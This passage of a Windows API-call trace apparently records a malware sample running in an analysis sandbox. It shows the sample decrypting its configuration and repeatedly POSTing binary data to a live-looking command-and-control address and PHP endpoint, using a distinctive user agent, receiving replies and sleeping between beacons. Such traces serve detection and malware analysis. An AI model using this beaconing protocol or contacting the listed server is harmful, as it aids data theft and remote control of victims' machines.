(HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0204.687] GetProcessHeap () returned 0x690000 [0204.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.697] GetProcessHeap () returned 0x690000 [0204.697] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0204.697] GetProcessHeap () returned 0x690000 [0204.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0204.698] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.699] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.699] GetProcessHeap () returned 0x690000 [0204.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0204.699] GetProcessHeap () returned 0x690000 [0204.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.700] send (s=0x478, buf=0x6abd08*, len=242, flags=0) returned 242 [0204.700] send (s=0x478, buf=0x6aba40*, len=159, flags=0) returned 159 [0204.701] GetProcessHeap () returned 0x690000 [0204.701] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0204.701] recv (in: s=0x478, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0204.791] GetProcessHeap () returned 0x690000 [0204.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0204.792] GetProcessHeap () returned 0x690000 [0204.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0204.792] GetProcessHeap () returned 0x690000 [0204.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0204.792] GetProcessHeap () returned 0x690000 [0204.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0204.793] closesocket (s=0x478) returned 0 [0204.797] GetProcessHeap () returned 0x690000 [0204.797] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0204.797] GetProcessHeap () returned 0x690000 [0204.797] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0204.798] GetProcessHeap () returned 0x690000 [0204.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0204.799] GetProcessHeap () returned 0x690000 [0204.799] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0204.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13a0) returned 0x478 [0204.801] Sleep (dwMilliseconds=0xea60) [0204.803] GetProcessHeap () returned 0x690000 [0204.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0204.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.804] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.813] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0204.821] GetProcessHeap () returned 0x690000 [0204.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0204.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.822] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0204.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.823] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.824] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.824] GetProcessHeap () returned 0x690000 [0204.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0204.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.825] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0204.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.826] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0204.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.833] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0204.833] GetProcessHeap () returned 0x690000 [0204.833] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0204.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.834] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.835] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.836] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.837] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.837] GetProcessHeap () returned 0x690000 [0204.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0204.837] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0204.837] GetProcessHeap () returned 0x690000 [0204.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0204.838] GetProcessHeap () returned 0x690000 [0204.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0204.838] GetProcessHeap () returned 0x690000 [0204.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0204.838] GetProcessHeap () returned 0x690000 [0204.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0204.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.847] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.854] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0204.892] GetProcessHeap () returned 0x690000 [0204.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0204.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.893] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0204.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.896] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.897] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.897] GetProcessHeap () returned 0x690000 [0204.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0204.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.898] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0204.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.911] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0204.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.912] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0204.912] GetProcessHeap () returned 0x690000 [0204.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0204.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.914] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0204.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.915] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0204.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.916] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0204.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.916] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0204.916] GetProcessHeap () returned 0x690000 [0204.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0204.916] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adb80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0204.917] GetProcessHeap () returned 0x690000 [0204.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0204.917] socket (af=2, type=1, protocol=6) returned 0x47c [0204.917] connect (s=0x47c, name=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0204.942] FreeAddrInfoW (pAddrInfo=0x6adb80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0204.942] GetProcessHeap () returned 0x690000 [0204.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0204.942] GetProcessHeap () returned 0x690000 [0204.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0204.942] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.943] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.943] GetProcessHeap () returned 0x690000 [0204.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0204.943] GetProcessHeap () returned 0x690000 [0204.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.944] GetProcessHeap () returned 0x690000 [0204.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0204.944] GetProcessHeap () returned 0x690000 [0204.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0204.944] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.945] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.945] GetProcessHeap () returned 0x690000 [0204.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0204.945] GetProcessHeap () returned 0x690000 [0204.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.945] send (s=0x47c, buf=0x6abd08*, len=242, flags=0) returned 242 [0204.946] send (s=0x47c, buf=0x6aba40*, len=159, flags=0) returned 159 [0204.946] GetProcessHeap () returned 0x690000 [0204.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0204.946] recv (in: s=0x47c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0205.019] GetProcessHeap () returned 0x690000 [0205.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0205.020] GetProcessHeap () returned 0x690000 [0205.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0205.021] GetProcessHeap () returned 0x690000 [0205.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0205.021] GetProcessHeap () returned 0x690000 [0205.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0205.022] closesocket (s=0x47c) returned 0 [0205.022] GetProcessHeap () returned 0x690000 [0205.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0205.022] GetProcessHeap () returned 0x690000 [0205.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0205.023] GetProcessHeap () returned 0x690000 [0205.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0205.024] GetProcessHeap () returned 0x690000 [0205.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0205.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13d0) returned 0x47c [0205.039] Sleep (dwMilliseconds=0xea60) [0205.043] GetProcessHeap () returned 0x690000 [0205.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0205.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.046] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0205.060] GetProcessHeap () returned 0x690000 [0205.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0205.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.061] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0205.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.062] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.063] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.063] GetProcessHeap () returned 0x690000 [0205.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0205.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.070] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0205.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.071] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0205.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.072] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0205.072] GetProcessHeap () returned 0x690000 [0205.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0205.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.073] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.074] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.075] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.075] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.076] GetProcessHeap () returned 0x690000 [0205.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0205.076] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.076] GetProcessHeap () returned 0x690000 [0205.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0205.077] GetProcessHeap () returned 0x690000 [0205.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0205.077] GetProcessHeap () returned 0x690000 [0205.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0205.078] GetProcessHeap () returned 0x690000 [0205.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0205.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.079] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0205.091] GetProcessHeap () returned 0x690000 [0205.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0205.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.092] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0205.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.092] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.093] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.093] GetProcessHeap () returned 0x690000 [0205.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0205.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.095] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0205.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.097] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0205.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.100] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0205.100] GetProcessHeap () returned 0x690000 [0205.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0205.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.101] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0205.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.102] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0205.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.103] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0205.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.104] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0205.104] GetProcessHeap () returned 0x690000 [0205.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0205.104] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad8b0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0205.104] GetProcessHeap () returned 0x690000 [0205.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0205.104] socket (af=2, type=1, protocol=6) returned 0x480 [0205.104] connect (s=0x480, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0205.130] FreeAddrInfoW (pAddrInfo=0x6ad8b0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0205.130] GetProcessHeap () returned 0x690000 [0205.130] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0205.130] GetProcessHeap () returned 0x690000 [0205.130] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0205.130] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.133] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.133] GetProcessHeap () returned 0x690000 [0205.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0205.133] GetProcessHeap () returned 0x690000 [0205.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.133] GetProcessHeap () returned 0x690000 [0205.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0205.133] GetProcessHeap () returned 0x690000 [0205.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0205.134] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.135] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.135] GetProcessHeap () returned 0x690000 [0205.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0205.135] GetProcessHeap () returned 0x690000 [0205.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.135] send 